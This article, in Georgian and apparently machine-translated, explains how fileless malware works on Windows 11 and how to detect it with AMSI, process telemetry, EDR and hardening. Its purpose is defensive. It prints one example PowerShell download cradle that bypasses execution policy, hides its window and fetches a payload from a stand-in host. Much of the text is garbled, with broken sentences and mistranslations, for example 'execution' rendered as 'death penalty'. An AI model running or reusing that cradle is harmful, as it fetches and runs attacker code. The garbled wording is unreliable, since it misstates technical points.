როგორ ამოვიცნოთ საშიში უფაილო მავნე პროგრამა Windows 11-ში

¿როგორ ამოვიცნოთ საშიში უფაილო მავნე პროგრამა? ფაილების გარეშე შეტევების აქტივობა მნიშვნელოვნად გაიზარდა და რაც უფრო უარესდება, Windows 11 არ არის იმუნურიეს მიდგომა დისკს გვერდს უვლის და მეხსიერებასა და ლეგიტიმურ სისტემურ ინსტრუმენტებს ეყრდნობა; სწორედ ამიტომ, ხელმოწერაზე დაფუძნებული ანტივირუსული პროგრამები სირთულეებს აწყდებიან. თუ მისი აღმოჩენის საიმედო გზას ეძებთ, პასუხი კომბინირებაშია. ტელემეტრია, ქცევის ანალიზი და Windows-ის კონტროლი.

ამჟამინდელ ეკოსისტემაში, PowerShell-ის, WMI-ის ან Mshta-ს ბოროტად გამოყენების კამპანიები თანაარსებობენ უფრო დახვეწილ ტექნიკებთან, როგორიცაა მეხსიერების ინექციები, დისკზე „შეხების გარეშე“ შენარჩუნება და კიდევ... პროგრამული უზრუნველყოფის დარღვევებიმთავარია გავიგოთ საფრთხის რუკა, შეტევის ფაზები და რა სიგნალებს ტოვებენ ისინი, მაშინაც კი, როდესაც ყველაფერი ოპერატიული მეხსიერების ფარგლებში ხდება.

რა არის ფაილების გარეშე მავნე პროგრამა და რატომ არის ის შემაშფოთებელი Windows 11-ში?

როდესაც ვსაუბრობთ „ფაილების გარეშე“ საფრთხეებზე, ვგულისხმობთ მავნე კოდს, რომელიც ახალი შესრულებადი ფაილების დეპონირება არ გჭირდებათ ფაილურ სისტემაში მუშაობისთვის. ის, როგორც წესი, შეჰყავთ გაშვებულ პროცესებში და სრულდება ოპერატიულ მეხსიერებაში, Microsoft-ის მიერ ხელმოწერილი ინტერპრეტატორებისა და ბინარული ფაილების საფუძველზე (მაგ., PowerShell, WMI, rundll32, mshtaეს ამცირებს თქვენს რესურსებს და საშუალებას გაძლევთ, გვერდი აუაროთ ძრავებს, რომლებიც მხოლოდ საეჭვო ფაილებს ეძებენ.

ამ ფენომენის ნაწილად ითვლება ოფისის დოკუმენტები ან PDF ფაილებიც კი, რომლებიც იყენებენ დაუცველობებს ბრძანებების გასაშვებად, რადგან მეხსიერებაში შესრულების გააქტიურება ანალიზისთვის სასარგებლო ბინარული ფაილების დატოვების გარეშე. ბოროტად გამოყენება მაკროები და DDE ოფისში, რადგან კოდი მუშაობს ლეგიტიმურ პროცესებში, როგორიცაა WinWord.

თავდამსხმელები სოციალურ ინჟინერიას (ფიშინგს, სპამ ბმულებს) ტექნიკურ ხაფანგებთან აერთიანებენ: მომხმარებლის დაწკაპუნება იწყებს ჯაჭვს, რომლის დროსაც სკრიპტი იტვირთება და მეხსიერებაში საბოლოო დატვირთვას ასრულებს. კვალის დატოვების თავიდან აცილება დისკზე. მიზნები მოიცავს მონაცემთა მოპარვიდან გამოსასყიდის პროგრამის განხორციელებამდე და ჩუმ გვერდით მოძრაობამდე.

ტიპოლოგიები სისტემაში ნაკვალევის მიხედვით: „სუფთადან“ ჰიბრიდებამდე

ცნებების დაბნეულობის თავიდან ასაცილებლად, სასარგებლოა საფრთხეების გამოყოფა ფაილურ სისტემასთან მათი ურთიერთქმედების ხარისხის მიხედვით. ეს კატეგორიზაცია განმარტავს რა რჩება, სად ინახება კოდი და რა ნიშნებს ტოვებს ის?.

ტიპი I: ფაილის აქტივობა არ არის

სრულიად ფაილების გარეშე მავნე პროგრამა დისკზე არაფერს წერს. კლასიკური მაგალითია... ქსელის დაუცველობა (როგორც იმ დროს EternalBlue ვექტორი) ბირთვის მეხსიერებაში განთავსებული უკანა კარის იმპლემენტაციისთვის (მაგალითად, DoublePulsar). აქ ყველაფერი ოპერატიულ მეხსიერებაში ხდება და ფაილურ სისტემაში არტეფაქტები არ არის.

კიდევ ერთი ვარიანტია დაბინძურება firmware კომპონენტები: BIOS/UEFI, ქსელური ადაპტერები, USB პერიფერიული მოწყობილობები (BadUSB ტიპის ტექნიკა) ან თუნდაც CPU ქვესისტემები. ისინი გადატვირთვისა და ხელახალი ინსტალაციის შემდეგაც კი შენარჩუნდება, დამატებითი სირთულეებით, რაც რამდენიმე პროდუქტი ამოწმებს პროგრამული უზრუნველყოფის პროგრამულ უზრუნველყოფას.ეს არის რთული შეტევები, ნაკლებად ხშირი, მაგრამ საშიში მათი ფარულობისა და გამძლეობის გამო.

ტიპი II: არაპირდაპირი არქივირების აქტივობა

აქ, მავნე პროგრამა არ „ტოვებს“ საკუთარ შესრულებად ფაილს, არამედ იყენებს სისტემის მიერ მართულ კონტეინერებს, რომლებიც არსებითად ფაილების სახით ინახება. მაგალითად, უკანა კარები, რომლებიც powershell ბრძანებები WMI საცავში და მისი შესრულების გააქტიურება მოვლენების ფილტრებით. მისი ინსტალაცია ბრძანების ხაზიდან შესაძლებელია ბინარული ფაილების წაშლის გარეშე, მაგრამ WMI საცავი დისკზე ლეგიტიმური მონაცემთა ბაზის სახით ინახება, რაც ართულებს მის გაწმენდას სისტემაზე ზემოქმედების გარეშე.

პრაქტიკული თვალსაზრისით, ისინი უფაილოდ ითვლება, რადგან ეს კონტეინერი (WMI, რეესტრი და ა.შ.) ეს არ არის კლასიკური ამოცნობადი შესრულებადი ფაილი და მისი გაწმენდა არც ისე ტრივიალურია. შედეგი: ფარული დაჟინება „ტრადიციული“ კვალის გარეშე.

ტიპი III: ფუნქციონირებისთვის საჭიროა ფაილები

ზოგიერთ შემთხვევაში ინარჩუნებს „ფაილების გარეშე“ მუდმივობა ლოგიკურ დონეზე, მათ ფაილზე დაფუძნებული ტრიგერი სჭირდებათ. ტიპიური მაგალითია Kovter: ის შემთხვევითი გაფართოებისთვის shell ზმნას არეგისტრირებს; როდესაც ამ გაფართოების მქონე ფაილი იხსნება, mshta.exe-ს გამოყენებით პატარა სკრიპტი ირთვება, რომელიც რეესტრიდან მავნე სტრიქონს აღადგენს.

ხრიკი იმაში მდგომარეობს, რომ შემთხვევითი გაფართოებების მქონე ეს „სატყუარა“ ფაილები არ შეიცავს ანალიზირებად დატვირთვას და კოდის ძირითადი ნაწილი... რეგისტრაციის (კიდევ ერთი კონტეინერი). სწორედ ამიტომ, ისინი კატეგორიზებულია, როგორც ფაილურები ზემოქმედების მიხედვით, მიუხედავად იმისა, რომ მკაცრად რომ ვთქვათ, ისინი ტრიგერის როლში ერთ ან რამდენიმე დისკის არტეფაქტზე არიან დამოკიდებული.

ინფექციის გადამტანები და „მასპინძლები“: სად შედის და სად იმალება

გამოვლენის გასაუმჯობესებლად, სასიცოცხლოდ მნიშვნელოვანია ინფექციის შეღწევის წერტილისა და მასპინძლის დადგენა. ეს პერსპექტივა ხელს უწყობს დიზაინის შექმნას. კონკრეტული კონტროლი პრიორიტეტი მიანიჭეთ შესაბამის ტელემეტრიას.

ექსპლოიტეტების

• ფაილზე დაფუძნებული (III ტიპი): დოკუმენტებს, შესრულებად ფაილებს, მემკვიდრეობით მიღებულ Flash/Java ფაილებს ან LNK ფაილებს შეუძლიათ გამოიყენონ ბრაუზერი ან მათი დამმუშავებელი ძრავა მეხსიერებაში shellcode-ის ჩასატვირთად. პირველი ვექტორი არის ფაილი, მაგრამ დატვირთვა გადადის ოპერატიულ მეხსიერებაში.
• ქსელზე დაფუძნებული (ტიპი I): პაკეტი, რომელიც იყენებს დაუცველობას (მაგ., SMB-ში), აღწევს შესრულებას მომხმარებლის სივრცეში ან ბირთვში. WannaCry-მა ეს მიდგომა პოპულარიზაციას გაუწია. პირდაპირი მეხსიერების დატვირთვა ახალი ფაილის გარეშე.

აპარატურა

• მოწყობილობები (ტიპი I): დისკის ან ქსელური ბარათის პროგრამული უზრუნველყოფის შეცვლა და კოდის დანერგვა შესაძლებელია. შემოწმება რთულია და ოპერაციული სისტემის გარეთაც რჩება.
• CPU და მართვის ქვესისტემები (ტიპი I): ისეთმა ტექნოლოგიებმა, როგორიცაა Intel-ის ME/AMT, აჩვენეს გზები ქსელური მუშაობა და შესრულება ოპერაციული სისტემის გარეთის ძალიან დაბალ დონეზე უტევს, მაღალი ფარულობის პოტენციალით.
• USB (ტიპი I): BadUSB საშუალებას გაძლევთ გადაპროგრამოთ USB დისკი კლავიატურის ან ქსელის ბარათის იმიტაციისთვის და ბრძანებების გაშვებით ან ტრაფიკის გადამისამართებით.
• BIOS / UEFI (ტიპი I): მავნე პროგრამული უზრუნველყოფის რეპროგრამირება (მაგალითად, Mebromi), რომელიც Windows-ის ჩატვირთვამდე მუშაობს.
• ჰიპერვიზორი (ტიპი I): ოპერაციული სისტემის ქვეშ მინი-ჰიპერვიზორის დანერგვა მისი არსებობის დასაფარად. იშვიათია, მაგრამ უკვე დაფიქსირებულია ჰიპერვიზორის რუტკიტების სახით.

შესრულება და ინექცია

• ფაილზე დაფუძნებული (III ტიპი): EXE/DLL/LNK ან დაგეგმილი დავალებები, რომლებიც იწყებენ ინექციებს ლეგიტიმურ პროცესებში.
• Macros (III ტიპი): Office-ში VBA-ს შეუძლია მომხმარებლის თანხმობით მოტყუების გზით ფაილების გაშიფვრა და შესრულება, მათ შორის სრული გამოსასყიდი პროგრამის.
• Scripts (ტიპი II): PowerShell, VBScript ან JScript ფაილიდან, ბრძანების ხაზიდან, მომსახურება, რეგისტრაცია ან WMIთავდამსხმელს შეუძლია სკრიპტის აკრეფა დისტანციურ სესიაზე დისკთან შეხების გარეშე.
• ჩატვირთვის ჩანაწერი (MBR/ჩატვირთვა) (II ტიპი): Petya-ს მსგავსი ოჯახები ახდენენ ჩატვირთვის სექტორის გადაწერას, რათა გაშვებისას კონტროლი აიღონ. ის ფაილური სისტემის გარეთაა, მაგრამ ხელმისაწვდომია ოპერაციული სისტემისთვის და თანამედროვე გადაწყვეტილებებისთვის, რომლებსაც შეუძლიათ მისი აღდგენა.

როგორ მუშაობს უფაილო შეტევები: ფაზები და სიგნალები

მიუხედავად იმისა, რომ ისინი შესრულებად ფაილებს არ ტოვებენ, კამპანიები ეტაპობრივ ლოგიკას მიჰყვება. მათი გაგება მონიტორინგის საშუალებას იძლევა. მოვლენები და პროცესებს შორის ურთიერთობები რომლებიც კვალს ტოვებენ.

• საწყისი წვდომაფიშინგის შეტევები ბმულების ან დანართების, კომპრომეტირებული ვებსაიტების ან მოპარული ავტორიზაციის მონაცემების გამოყენებით. ბევრი ჯაჭვი იწყება Office დოკუმენტით, რომელიც ააქტიურებს ბრძანებას. PowerShell.
• მდგრადობა: WMI-ის საშუალებით უკანა კარები (ფილტრები და გამოწერები), რეესტრის შესრულების გასაღებები ან დაგეგმილი დავალებები, რომლებიც ხელახლა რთავენ სკრიპტებს ახალი მავნე ფაილის გარეშე.
• ექსფილტრაციაინფორმაციის შეგროვების შემდეგ, ის იგზავნება ქსელიდან სანდო პროცესების (ბრაუზერები, PowerShell, bitsadmin) გამოყენებით ტრაფიკის შესარევად.

ეს ნიმუში განსაკუთრებით მზაკვრულია, რადგან შეტევის ინდიკატორები ისინი ნორმალურობაში იმალებიან: ბრძანების ხაზის არგუმენტები, პროცესების ჯაჭვური კავშირი, ანომალიური გამავალი კავშირები ან ინექციის API-ებზე წვდომა.

გავრცელებული ტექნიკა: მეხსიერებიდან ჩაწერამდე

მსახიობები სხვადასხვა ფაქტორზე არიან დამოკიდებულნი: მეთოდები რომლებიც ფარულობის ოპტიმიზაციას ახდენს. ეფექტური აღმოჩენის გასააქტიურებლად სასარგებლოა ყველაზე გავრცელებული მათგან იცოდეთ.

• მეხსიერებაში მცხოვრები: დატვირთვების ჩატვირთვა სანდო პროცესის სივრცეში, რომელიც აქტივაციას ელოდება. რუტკიტები და ჰუკები ბირთვში ისინი ამაღლებენ დამალვის დონეს.
• რეესტრში მდგრადობადაშიფრული ბლობები შეინახეთ გასაღებებში და ხელახლა ჰიდრატაცია გაუკეთეთ ლეგიტიმურ გამშვებ მოწყობილობას (mshta, rundll32, wscript). ეფემერულ ინსტალერს შეუძლია თვითგანადგურება მისი დატვირთვის მინიმიზაციის მიზნით.
• ავტორიზაციის ფიშინგიმოპარული მომხმარებლის სახელებისა და პაროლების გამოყენებით, თავდამსხმელი ახორციელებს დისტანციურ ჭურვებსა და ქარხნებს. ჩუმი წვდომა რეესტრში ან WMI-ში.
• „ფაილების გარეშე“ გამოსასყიდი პროგრამადაშიფვრა და C2 კომუნიკაცია ოპერატიული მეხსიერებიდან ხორციელდება, რაც ამცირებს აღმოჩენის შესაძლებლობებს მანამ, სანამ დაზიანება თვალსაჩინო არ გახდება.
• ოპერაციული ნაკრებები: ავტომატიზირებული ჯაჭვები, რომლებიც აფიქსირებენ დაუცველობებს და მომხმარებლის მიერ დაწკაპუნების შემდეგ ათავსებენ მხოლოდ მეხსიერებისთვის განკუთვნილ დატვირთვებს.
• დოკუმენტები კოდითმაკროები და მექანიზმები, როგორიცაა DDE, რომლებიც ააქტიურებენ ბრძანებებს შესრულებადი ფაილების დისკზე შენახვის გარეშე.

ინდუსტრიის კვლევებმა უკვე აჩვენა მნიშვნელოვანი პიკები: 2018 წლის ერთ პერიოდში, 90%-ზე მეტი ზრდა სკრიპტზე დაფუძნებული და PowerShell ჯაჭვური შეტევების დროს, ეს იმის ნიშანია, რომ ვექტორი სასურველია მისი ეფექტურობის გამო.

კომპანიებისა და მომწოდებლებისთვის გამოწვევა: რატომ არ არის საკმარისი დაბლოკვა

ცდუნება იქნებოდა PowerShell-ის გამორთვა ან მაკროების სამუდამოდ აკრძალვა, მაგრამ ოპერაციას ჩაშლიდი.PowerShell თანამედროვე ადმინისტრირების საყრდენია, ხოლო Office აუცილებელია ბიზნესში; ბრმად დაბლოკვა ხშირად შეუძლებელია.

გარდა ამისა, არსებობს ძირითადი კონტროლის გვერდის ავლის გზები: PowerShell-ის გაშვება DLL-ებისა და rundll32-ის მეშვეობით, სკრიპტების შეფუთვა EXE ფაილებში, თან იქონიეთ PowerShell-ის თქვენი საკუთარი ასლი ან თუნდაც სკრიპტების დამალვა სურათებში და მათი მეხსიერებაში ამოღება. ამიტომ, დაცვა არ შეიძლება დაფუძნებული იყოს მხოლოდ ინსტრუმენტების არსებობის უარყოფაზე.

კიდევ ერთი გავრცელებული შეცდომაა მთელი გადაწყვეტილების ღრუბელზე დელეგირება: თუ აგენტს სერვერისგან პასუხის ლოდინი უწევს, თქვენ კარგავთ რეალურ დროში პრევენციასტელემეტრიული მონაცემების ატვირთვა შესაძლებელია ინფორმაციის გასამდიდრებლად, მაგრამ შერბილება უნდა მოხდეს საბოლოო წერტილში.

როგორ ამოვიცნოთ ფაილების გარეშე მავნე პროგრამა Windows 11-ში: ტელემეტრია და ქცევა

გამარჯვებული სტრატეგია არის პროცესების და მეხსიერების მონიტორინგიფაილები არა. მავნე ქცევები ფაილის მიერ მიღებულ ფორმებზე უფრო სტაბილურია, რაც მათ პრევენციული სისტემებისთვის იდეალურს ხდის.

• AMSI (ანტიმავნე პროგრამების სკანირების ინტერფეისი)ის ახერხებს PowerShell, VBScript ან JScript სკრიპტების ჩაჭრას, მაშინაც კი, როდესაც ისინი დინამიურად არის აგებული მეხსიერებაში. შესანიშნავია შესრულებამდე დაბნეული სტრიქონების აღსაწერად.
• პროცესის მონიტორინგი: დაწყება/დასასრული, PID, მშობლები და შვილები, მარშრუტები, ბრძანების ხაზები და ჰეშები, პლუს შესრულების ხეები სრული ისტორიის გასაგებად.
• მეხსიერების ანალიზი: ინექციების, ამრეკლავი ან PE დატვირთვების აღმოჩენა დისკთან შეხების გარეშე და უჩვეულო შესრულებადი ფაილების რეგიონების მიმოხილვა.
• სტარტერის სექტორის დაცვა: MBR/EFI-ის კონტროლი და აღდგენა ხელყოფის შემთხვევაში.

Microsoft-ის ეკოსისტემაში, Defender for Endpoint აერთიანებს AMSI-ს, ქცევის მონიტორინგიმეხსიერების სკანირება და ღრუბელზე დაფუძნებული მანქანური სწავლება გამოიყენება ახალი ან ბუნდოვანი ვარიანტების დეტექციის მასშტაბირებისთვის. სხვა მომწოდებლები მსგავს მიდგომებს იყენებენ ბირთვის რეზიდენტ ძრავებთან.

კორელაციის რეალისტური მაგალითი: დოკუმენტიდან PowerShell-მდე

წარმოიდგინეთ ჯაჭვი, სადაც Outlook ჩამოტვირთავს დანართს, Word ხსნის დოკუმენტს, ჩართულია აქტიური შინაარსი და PowerShell ირთვება საეჭვო პარამეტრებით. სათანადო ტელემეტრია აჩვენებს ბრძანების ხაზი (მაგ., ExecutionPolicy Bypass, დამალული ფანჯარა), არასანდო დომენთან დაკავშირება და შვილობილი პროცესის შექმნა, რომელიც თავად ინსტალირდება AppData-ში.

ლოკალური კონტექსტის მქონე აგენტს შეუძლია გაჩერება და უკან დაბრუნება მავნე აქტივობა ხელით ჩარევის გარეშე, SIEM-ის შეტყობინების ან ელექტრონული ფოსტით/SMS-ით შეტყობინების გარდა. ზოგიერთი პროდუქტი ამატებს ძირეული მიზეზის ატრიბუციის ფენას (StoryLine ტიპის მოდელები), რომელიც მიუთითებს არა ხილულ პროცესზე (Outlook/Word), არამედ სრული მავნე თემა და მისი წარმოშობა სისტემის ყოვლისმომცველი გაწმენდისკენ იყო მიმართული.

ტიპური ბრძანების ნიმუში, რომელსაც ყურადღება უნდა მიაქციოთ, შეიძლება ასე გამოიყურებოდეს: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');ლოგიკა ზუსტი სტრიქონი არ არის, მაგრამ სიგნალების ნაკრები: პოლიტიკის გვერდის ავლა, დამალული ფანჯარა, ჩამოტვირთვის გასუფთავება და მეხსიერებაში შესრულება.

AMSI, არხები და თითოეული მოთამაშის როლი: საბოლოო წერტილიდან SOC-მდე

სკრიპტის აღების გარდა, ძლიერი არქიტექტურა აწესრიგებს ნაბიჯებს, რომლებიც ხელს უწყობს გამოძიებას და რეაგირებას. რაც უფრო მეტი მტკიცებულება იქნება დატვირთვის შესრულებამდე, მით უკეთესი., საუკეთესო

• სკრიპტის ჩაჭრაAMSI აწვდის კონტენტს (მაშინაც კი, თუ ის მომენტალურად გენერირდება) სტატიკური და დინამიური ანალიზისთვის მავნე პროგრამების მილსადენში.
• პროცესის მოვლენებიგროვდება PID-ები, ბინარული ფაილები, ჰეშები, მარშრუტები და სხვა მონაცემები. არგუმენტები, საბოლოო ჩატვირთვამდე მიმავალი პროცესის ხეების შექმნით.
• აღმოჩენა და ანგარიშგებააღმოჩენები ნაჩვენებია პროდუქტის კონსოლზე და გადამისამართდება ქსელურ პლატფორმებზე (NDR) კამპანიის ვიზუალიზაციისთვის.
• მომხმარებლის გარანტიებიმაშინაც კი, თუ სკრიპტი მეხსიერებაში შეიყვანება, ჩარჩო AMSI წყვეტს მას Windows-ის თავსებად ვერსიებში.
• ადმინისტრატორის შესაძლებლობები: პოლიტიკის კონფიგურაცია სკრიპტის შემოწმების ჩასართავად, ქცევაზე დაფუძნებული ბლოკირება და კონსოლიდან ანგარიშების შექმნა.
• SOC-ის მუშაობაარტეფაქტების (VM UUID, OS ვერსია, სკრიპტის ტიპი, ინიციატორის პროცესი და მისი მშობელი, ჰეშები და ბრძანების ხაზები) ამოღება ისტორიის ხელახლა შესაქმნელად და ლიფტის წესები მომავალი.

როდესაც პლატფორმა ექსპორტის საშუალებას იძლევა მეხსიერების ბუფერი შესრულებასთან დაკავშირებით, მკვლევრებს შეუძლიათ ახალი აღმოჩენების გენერირება და მსგავსი ვარიანტებისგან დაცვის გამდიდრება.

პრაქტიკული ზომები Windows 11-ში: პრევენცია და ნადირობა

მეხსიერების შემოწმებითა და AMSI-ით EDR-ის გარდა, Windows 11 საშუალებას გაძლევთ დახუროთ შეტევის სივრცეები და გააუმჯობესოთ ხილვადობა. მშობლიური კონტროლი.

• რეგისტრაცია და შეზღუდვები PowerShell-შიჩართავს სკრიპტის ბლოკების ჟურნალირების და მოდულების ჟურნალირების ფუნქციას, იყენებს შეზღუდულ რეჟიმებს, სადაც ეს შესაძლებელია, და აკონტროლებს გამოყენებას. გვერდის ავლითი/დამალული.
• შეტევის ზედაპირის შემცირების (ASR) წესები: ბლოკავს სკრიპტების გაშვებას Office-ის პროცესების მიერ და WMI-ის ბოროტად გამოყენება/PSExec, როდესაც ეს საჭირო არ არის.
• ოფისის მაკრო პოლიტიკა: ნაგულისხმევად გამორთავს შიდა მაკრო ხელმოწერას და მკაცრ ნდობის სიებს; აკონტროლებს მემკვიდრეობით მიღებულ DDE ნაკადებს.
• WMI აუდიტი და რეესტრიაკონტროლებს ღონისძიებების გამოწერებს და ავტომატური შესრულების გასაღებებს (Run, RunOnce, Winlogon), ასევე დავალებების შექმნას. დაგეგმილია.
• გაშვების დაცვაააქტიურებს უსაფრთხო ჩატვირთვას, ამოწმებს MBR/EFI მთლიანობას და ადასტურებს, რომ გაშვებისას ცვლილებები არ არის.
• შელესვა და გამკვრივება: ხურავს ექსპლუატაციაში მყოფ დაუცველობებს ბრაუზერებში, Office კომპონენტებსა და ქსელურ სერვისებში.
• ცნობიერება: ამზადებს მომხმარებლებს და ტექნიკურ გუნდებს ფიშინგსა და სიგნალებში ფარული სიკვდილით დასჯა.

ძიებისას, ყურადღება გაამახვილეთ შემდეგ კითხვებზე: Office-ის მიერ PowerShell/MSHTA-სკენ პროცესების შექმნა, არგუმენტები ჩამოტვირთვის სტრიქონი/ჩამოტვირთვის ფაილისკრიპტები მკაფიო დაბინდვით, ამრეკლავი ინექციებით და საეჭვო ზედა დონის დომენებზე გამავალი ქსელებით. ხმაურის შესამცირებლად, შეადარეთ ეს სიგნალები რეპუტაციასა და სიხშირეს.

რა შეუძლია დღეს თითოეულ ძრავას აღმოაჩინოს?

Microsoft-ის საწარმო გადაწყვეტილებები აერთიანებს AMSI-ს, ქცევით ანალიტიკას, მეხსიერების შემოწმება და ჩატვირთვის სექტორის დაცვა, პლუს ღრუბელზე დაფუძნებული ML მოდელები ახალი საფრთხეების წინააღმდეგ საბრძოლველად. სხვა მომწოდებლები ნერგავენ ბირთვის დონის მონიტორინგს, რათა განასხვავონ მავნე და არაკეთილთვისებიანი პროგრამული უზრუნველყოფა ცვლილებების ავტომატური გაუქმებით.

მიდგომა, რომელიც დაფუძნებულია სიკვდილით დასჯის ისტორიები ეს საშუალებას გაძლევთ, დაადგინოთ ძირეული მიზეზი (მაგალითად, Outlook-ის დანართი, რომელიც ჯაჭვს ააქტიურებს) და შეამსუბუქოთ მთელი ხის უარყოფითი მხარეები: სკრიპტები, გასაღებები, დავალებები და შუალედური ბინარული ფაილები, რათა თავიდან აიცილოთ ხილულ სიმპტომზე გაჭედვა.

გავრცელებული შეცდომები და როგორ ავიცილოთ თავიდან ისინი

PowerShell-ის დაბლოკვა ალტერნატიული მართვის გეგმის გარეშე არა მხოლოდ არაპრაქტიკულია, არამედ არსებობს... მისი არაპირდაპირი გამოძახების გზებიიგივე ეხება მაკროებსაც: ან მათ პოლიტიკებითა და ხელმოწერებით მართავთ, ან ბიზნესი დაზარალდება. უმჯობესია, ყურადღება ტელემეტრიასა და ქცევით წესებზე გაამახვილოთ.

კიდევ ერთი გავრცელებული შეცდომაა იმის დაჯერება, რომ თეთრ სიაში შეყვანის აპლიკაციები ყველაფერს წყვეტს: ფაილების გარეშე ტექნოლოგია სწორედ ამაზეა დამოკიდებული. სანდო აპებიკონტროლის ორგანომ უნდა დააკვირდეს, თუ რას აკეთებენ და როგორ ურთიერთობენ ისინი და არა მხოლოდ იმას, აქვთ თუ არა მათთვის უფლება.

ყოველივე ზემოთქმულის გათვალისწინებით, ფაილების გარეშე მავნე პროგრამა აღარ არის „მოჩვენება“, როდესაც აკონტროლებთ იმას, რაც ნამდვილად მნიშვნელოვანია: ქცევა, მეხსიერება და წარმოშობა თითოეული შესრულების. AMSI-ის, მდიდარი პროცესის ტელემეტრიის, Windows 11-ის მშობლიური კონტროლისა და EDR ფენის ქცევითი ანალიზის კომბინაცია უპირატესობას გაძლევთ. განტოლებას დაუმატეთ მაკროებისა და PowerShell-ის რეალისტური პოლიტიკა, WMI/რეესტრის აუდიტი და ბრძანების ხაზებისა და პროცესის ხეების პრიორიტეტულობის მინიჭების ძიების სისტემა და მიიღებთ დაცვას, რომელიც წყვეტს ამ ჯაჭვებს ხმის გამოცემამდე.